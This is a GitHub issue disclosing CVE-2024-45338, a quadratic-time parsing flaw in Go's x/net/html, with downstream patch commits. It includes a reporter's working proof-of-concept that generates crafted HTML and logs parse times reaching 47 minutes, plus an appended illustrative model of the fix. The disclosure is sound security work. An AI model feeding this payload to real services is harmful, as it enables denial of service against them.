
x/net/html: non-linear parsing of case-insensitive content #70906

Closed
rolandshoemaker opened this issue Dec 18, 2024 · 3 comments
Labels: NeedsFix (The path to resolution is known, but the work has not been done.), Security
Milestone: Unreleased
Comments

rolandshoemaker (Member) commented Dec 18, 2024

An attacker can craft an input to the Parse functions that would be processed non-linearly with respect to its length, resulting in extremely slow parsing.

Thanks to Guido Vranken for reporting this issue.

This is CVE-2024-45338.

gopherbot (Contributor) commented

Change https://go.dev/cl/637536 mentions this issue: html: use strings.EqualFold instead of lowering ourselves

dmitshur added the NeedsFix label Dec 18, 2024
dmitshur added this to the Unreleased milestone Dec 18, 2024
rolandshoemaker changed the title from "security: fix CVE-2024-45338" to "x/net/html: non-linear parsing of case-insensitive content" Dec 18, 2024
glours added a commit to glours/compose that referenced this issue Dec 19, 2024
brianmcarey added a commit to brianmcarey/kubevirt that referenced this issue Dec 19, 2024
A high vulnerability(CVE-2024-45338)[1] is resolved in golang.org/x/net
v0.33.0[2]

Update to this version.

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-45338
[2] golang/go#70906

Signed-off-by: Brian Carey <[email protected]>
unexge pushed a commit to awslabs/mountpoint-s3-csi-driver that referenced this issue Dec 19, 2024
*Issue #, if available:* golang/go#70906

*Description of changes:*

This change updates the version of the net/html package provided by the
Golang project.

By submitting this pull request, I confirm that you can use, modify,
copy, and redistribute this contribution, under the terms of your
choice.

Signed-off-by: Daniel Carl Jones <[email protected]>
haaag added a commit to haaag/gm that referenced this issue Dec 19, 2024
Reference:
- [CVE-2024-45338](GHSA-w32m-9786-jp63)
- [x/net/html: non-linear parsing of case-insensitive content golang/go#70906](golang/go#70906)
guidovranken commented

The following reproducer prints the execution time of html.Parse() to process 1, 2, 4, 8, 16, 32, 64, 128, 256, 512 and 1024 kilobytes of crafted input.

package main

import (
    "bytes"
    "fmt"
    "time"

    "golang.org/x/net/html"
)

// generate builds size bytes of crafted input: a <math><Annotation-xml> open tag whose
// encoding attribute value is size/2 bytes of 0xFF (not valid UTF-8), followed by
// size/2 bytes made of "><</" repeated size/8 times.
func generate(size int) []byte {
    size1 := size / 2
    size2 := size / 8
    out := []byte("<math><Annotation-xml encoding=")
    out = append(out, bytes.Repeat([]byte{0xFF}, size1)...)
    out = append(out, bytes.Repeat([]byte("><</"), size2)...)
    return out
}

func main() {
    // Double the input size each round so the growth rate of the parse time is visible.
    for kb := 1; kb <= 1024; kb *= 2 {
        data := generate(1024 * kb)
        start := time.Now()
        // The parsed tree and the error are discarded; only the elapsed time is of interest.
        _, _ = html.Parse(bytes.NewReader(data))
        duration := time.Since(start)
        fmt.Printf("Parsing %d kb took %s\n", kb, duration)
    }
}

Output on AMD Ryzen 5 5600G, Linux x64 using go1.23.2 linux/amd64 (from https://go.dev/dl/go1.23.2.linux-amd64.tar.gz)

Parsing 1 kb took 3.08939ms
Parsing 2 kb took 11.730778ms
Parsing 4 kb took 37.71703ms
Parsing 8 kb took 146.944095ms
Parsing 16 kb took 605.988269ms
Parsing 32 kb took 2.341168259s
Parsing 64 kb took 9.875122735s
Parsing 128 kb took 41.930787863s
Parsing 256 kb took 2m59.680417561s
Parsing 512 kb took 12m2.349134038s
Parsing 1024 kb took 47m38.232269575s
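The issue text says only that parsing is non-linear, and the fix CL says only that it replaces "lowering ourselves" with strings.EqualFold. The following example is added here to show why that swap changes the complexity; it is not x/net's code and does not depend on golang.org/x/net. The shape of the check (an annotation-xml element in the math namespace whose encoding attribute is compared case-insensitively against "text/html" and "application/xhtml+xml") is an assumption modelled on the reproducer's input and the CL title; the Attr type, the function names, and the per-token loop are constructed for illustration. The attribute values and token counts are built inline.

```go
package main

import (
	"bytes"
	"fmt"
	"strings"
	"time"
)

// Attr is a constructed stand-in for the key/value attribute pair carried on an
// html.Node; it is not x/net's type.
type Attr struct {
	Key string
	Val string
}

// integrationPointLowering is an ASSUMED model of the pre-fix check: the whole
// value of the encoding attribute is lowercased on every call, so each call costs
// O(len(Val)) and allocates a copy of it.
func integrationPointLowering(attrs []Attr) bool {
	for _, a := range attrs {
		if a.Key == "encoding" {
			val := strings.ToLower(a.Val)
			if val == "text/html" || val == "application/xhtml+xml" {
				return true
			}
		}
	}
	return false
}

// integrationPointFold is the same predicate written the way the CL title
// describes: strings.EqualFold compares in place and stops at the first
// mismatching rune, so a long value that does not match is rejected after one rune.
func integrationPointFold(attrs []Attr) bool {
	for _, a := range attrs {
		if a.Key == "encoding" {
			if strings.EqualFold(a.Val, "text/html") || strings.EqualFold(a.Val, "application/xhtml+xml") {
				return true
			}
		}
	}
	return false
}

// craftedAttrs mirrors the reproducer's input shape: an encoding attribute whose
// value is size/2 bytes of 0xFF (invalid UTF-8, so strings.ToLower cannot take
// its ASCII fast path). Constructed sample input.
func craftedAttrs(size int) []Attr {
	return []Attr{{Key: "encoding", Val: string(bytes.Repeat([]byte{0xFF}, size/2))}}
}

// foreignContentTokens models the parser re-evaluating the integration-point
// predicate on the current node once per token while it is inside <math>; the
// reproducer's "><</" repeats supply a token count proportional to the input size.
// It returns how many of those evaluations reported an integration point.
func foreignContentTokens(attrs []Attr, tokens int, check func([]Attr) bool) int {
	hits := 0
	for i := 0; i < tokens; i++ {
		if check(attrs) {
			hits++
		}
	}
	return hits
}

func main() {
	checks := []struct {
		name  string
		check func([]Attr) bool
	}{{"ToLower", integrationPointLowering}, {"EqualFold", integrationPointFold}}
	// Same doubling schedule as the reproducer, capped at 32 kb so the quadratic
	// variant finishes in seconds rather than minutes.
	for kb := 1; kb <= 32; kb *= 2 {
		size := 1024 * kb
		attrs := craftedAttrs(size)
		tokens := size / 8
		for _, c := range checks {
			start := time.Now()
			foreignContentTokens(attrs, tokens, c.check)
			fmt.Printf("%-9s %4d kb: %s\n", c.name, kb, time.Since(start))
		}
	}
}
```

The ToLower variant does tokens × len(Val) work, which is quadratic in the input size because both factors grow with it; the EqualFold variant does constant work per token on the crafted value, so it stays linear. One caveat before applying the same substitution elsewhere: strings.EqualFold uses simple case folding, while strings.ToLower applies full lowercase mappings, so the two predicates can disagree on a few non-ASCII code points (for example U+0130, whose lowercase form is the ASCII letter i). For the ASCII constants compared here that difference only affects whether such exotic values are accepted as an integration point, which is the safer direction; check it for any other comparison you rewrite this way.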
